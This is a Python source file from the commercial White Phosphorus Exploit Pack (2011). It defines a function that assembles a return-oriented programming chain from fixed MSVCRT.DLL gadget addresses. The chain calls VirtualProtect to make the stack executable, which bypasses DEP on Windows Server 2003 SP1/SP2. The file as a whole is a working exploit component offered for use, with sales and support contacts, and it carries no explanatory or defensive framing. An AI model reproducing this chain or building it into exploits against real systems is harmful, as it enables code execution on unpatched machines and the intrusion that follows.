#+-------- --- -
#| White Phosphorus Exploit Pack Universal 2k3 DEP Bypass Chain
#|  July 2011
#+--
    
from struct import pack
    
def wp_UniversalDEPBypassWin2k3_VP(size=2200):
    # White Phosphorus (2010)
    # Universal DEP Bypass for Windows 2k3 SP1/SP2 using VirtualProtect
    #
    # This routine will make the current ESP + size bytes of the stack frame
    # executable using VirtualProtect and then return to the stack
    # 
    # Uses MSVCRT.DLL which has remained static on 2k3 from SP1->Current
    #
    # web:   http://www.whitephosphorus org
    # mail:  support@whitephosphorus org
    # sales: http://www.immunityinc.com/products-whitephosphorus.shtml    
   
    size += 48 # This is the size of the DEP bypass + ptr in 
                # relation to the initial ESP
            
    print "WP> Building Universal Windows 2003 DEP bypass using VirtualProtect"
    depBypass = pack('<L', 0x77BE8B31)  # push esp;pop esi;pop;ret
    depBypass += "X" * 4                # random junk buffer
    depBypass += pack('<L', 0x77BAF38E) # mov eax,esi;pop esi;pop ebp;ret
    depBypass += "X" * 24               # random junk buffer
    depBypass += pack('<L', 0x77BC5F6C) # add eax,58;ret
    depBypass += pack('<L', 0x77BCC397) # add eax,2c;pop;ret
    depBypass += "X" * 4                # random junk buffer
    depBypass += pack('<L', 0x77BAF7CD) # add eax,0c;ret
    depBypass += pack('<L', 0x77BDCA9B) # xchg eax,edi;ret
    depBypass += pack('<L', 0x77BB2563) # pop eax;
    depBypass += pack('<L', 0x22222222) # {eax value}
    depBypass += pack('<L', 0x77BB1C65) # pop ecx;ret
    
    size = 0x22222222 - size            # This is the size calculation
        
    depBypass += pack('<L', size & 0xffffffff) # {ESI Adjustment}
    depBypass += pack('<L', 0x77BD87CA) # sub eax,ecx;ret
    depBypass += pack('<L', 0x77BEABB4) # STOSD;ret
    depBypass += pack('<L', 0x77BAF410) # xor eax,eax;ret
    depBypass += pack('<L', 0x77BDFC1D) # add eax,40;pop;ret
    depBypass += "X" * 4                # random junk buffer
    depBypass += pack('<L', 0x77BEABB4) # STOSD;ret
    depBypass += pack('<L', 0x77BB2563) # pop eax;ret
    depBypass += pack('<L', 0x77BF5F20) # {writeable address}
    depBypass += pack('<L', 0x77BEABB4) # STOSD;ret
    depBypass += pack('<L', 0x77BDCA9B) # xchg eax,edi;ret
    depBypass += pack('<L', 0x77BBF2FF) # xchg eax,ebp;ret
    depBypass += pack('<L', 0x77BE8B31) # push esp;pop esi;pop;ret
    depBypass += "X" * 4                # random junk buffer
    depBypass += pack('<L', 0x77BEABB5) # ret               
    depBypass += "X" * 16               # random junk buffer
    depBypass += pack('<L', 0x77BBCCBC) # VirtualProtect Call
    depBypass += "X" * 16               # random junk buffer
    depBypass += pack('<L', 0x77BE2265) # push esp;ret

    print "WP> Universal DEP Bypass Size: %d Bytes" % len(depBypass) 
    return depBypass